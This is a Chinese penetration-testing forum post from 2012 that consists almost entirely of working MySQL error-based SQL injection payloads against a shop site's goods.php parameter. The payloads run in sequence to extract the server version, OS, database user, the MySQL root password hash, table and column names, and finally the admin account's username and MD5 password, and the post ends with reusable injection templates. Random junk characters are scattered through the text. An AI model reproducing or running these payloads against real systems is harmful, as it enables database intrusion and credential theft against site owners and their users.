找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2449|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 4 r9 c& |. r, x' [
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" j; `) u. o% @6 m( {

/ I; R8 X  n; z  }7 a0 E判断系统* ?: D5 m, G% r! R+ W$ }* Y
9 o, I- y# t( T0 V: p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 V; i0 C7 _4 s& F1 p2 Q3 ~: ]( i( c
, d# ?" E- ?/ q0 K. k

! S+ L8 @, D8 C+ r4 y) Y' K当前 user()
# O4 w% M% [9 R# u7 B/ {
3 N) C2 ?5 D+ Y, e/ ^( H. L, Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( y0 E" }' P- p: t! r3 \

8 G' K0 A$ n& q5 _& c: u& a" z) r! N$ o' M
0 ~% x4 E! A7 s3 V
当前 database()
7 i  x$ Q# X3 i9 z0 b/ Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 C$ {3 ~# J$ Z6 U" h: Z

: M7 g& j- a/ s0 P$ F+ z
6 B* @4 F5 K4 q3 {" ?6 R7 L* Z6 a' L, P( K! i4 Y5 N
/ o$ ?' a8 k8 T
root hash* D/ M* A* |' m2 A0 d7 {* L

+ u4 E# A7 T0 F) q. a6 ^" ?* Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 Z0 i' d* t$ k! R
* U# G5 f; [  x0 f. x4 U5 X, n7 k
! K$ f) D' {5 ~
9 m" O) F6 N" l5 b$ w& G当前 数据库表名: o6 ?2 ~; s# Y3 @* a1 z

5 ]4 Q' g( V5 Z# e! ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 H% l! n' q8 F' p, T  p9 G0 c5 Z% n$ s# V

6 s" K# ?0 }' k! J0 g) C- E8 H* g
当前 数据库 user_name 字段3 i3 e. ?( Z2 b/ t3 {, {6 I, z
$ ^" [8 n6 C8 m/ ?8 K  x
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& {& ~* w9 U% `! y7 V3 I+ z; S. m

8 F3 [  }7 |+ U; a当前 数据库 字段 password
, H- w6 @4 s( h4 t' W/ h, whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 h: `: m% H  P5 O! A) d

! M- G' E3 ]" Q( l2 H* W0 c& x1 Q$ z5 x$ V& L
1 _) P6 h% c9 ]
获得 admin passwd(md5)
8 t  \2 o4 u2 M- ^* G& M+ @6 C, P" Y8 z8 u: t# Y5 k
3 ^8 t4 @; D1 q) T2 o* y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 m  J; Q5 q1 \1 A
  K: G# D+ F" R3 f" F4 y报错注射
1 d" [4 q  q  OSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
( [) n: O9 V9 O% {7 {4 y7 l$ G0 t; ~* K0 b+ G9 k
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 x* m, l0 ~) l: J4 d0 x2 Q& {1 q1 R9 {& @; h# `- E( T/ ~
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表